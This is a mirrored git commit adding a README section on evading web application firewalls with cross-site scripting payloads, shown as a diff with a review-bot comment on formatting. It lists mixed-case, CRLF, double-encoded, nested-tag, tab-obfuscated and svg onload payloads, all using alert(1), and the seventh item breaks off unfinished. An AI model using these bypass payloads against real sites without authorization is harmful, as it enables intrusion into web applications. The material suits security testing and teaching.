mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-23 12:13:05 +00:00
Update README.md
This commit is contained in:
parent
d3a16197aa
commit
b6d25c758a
1 changed file with 13 additions and 1 deletion
14
README.md
@ -266,22 +266,34 @@ Here’s list of tools [@_justYnot](https://twitter.com/_justYnot) used:
|
|||
## XSS firewall bypass techniques
|
||||
Here’s a list of 7 useful techniques on how we can bypass WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application:
|
||||
1. Check if the firewall is blocking only lowercase:
|
||||
<sCRipT>alert(document.domain)</sCRiPt>
|
||||
```
|
||||
<sCRipT>alert(1)</sCRiPt>
|
||||
```
|
||||
|
||||
2. Try to break firewall regex with new line (\r\n), aka. CRLF injection:
|
||||
```
|
||||
<script>%0d%0aalert(1)</script>
|
||||
```
|
||||
|
||||
3. Try double encoding:
|
||||
```
|
||||
%2522
|
||||
```
|
||||
|
||||
4. Testing for recursive filters, if firewall removes the text in bold, we will have clear payload:
|
||||
```
|
||||
<scr<script>ipt>alert(1);</scr</script>ipt>
|
||||
```
|
||||
|
||||
5. Injecting anchor tag without whitespaces:
|
||||
```
|
||||
<a/href="j	a	v	asc	ri	pt:alert(1)">
|
||||
```
|
||||
|
||||
6. Try to bypass whitespaces using a bullet:
|
||||
```
|
||||
<svg•onload=alert(1)>
|
||||
```
|
||||
|
||||
7. Try to change request method (POST instead of GET):
|
||||
|
||||
|
|
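Review bot: in item 1 the first payload, `<sCRipT>alert(document.domain)</sCRiPt>`, sits outside the code fence (the fence only opens on the following line), so Markdown will treat it as raw HTML and the renderer will strip or hide it; either move it inside the fence next to the `alert(1)` variant or drop it as a duplicate. Item 4 says "if firewall removes the text in bold", but there is no bold markup and none can be shown inside a fenced block; name the substring the filter is expected to strip in the sentence itself (e.g. "the inner `<script>` and `</script>`"). Items 5 and 6 depend on characters a reader cannot tell apart from a plain space (tabs inside `javascript:` in item 5, the `•` in item 6); state that in the list text so the examples are not copied as ordinary whitespace. Item 7 ends at the heading with no example or explanation, so it reads as an unfinished entry.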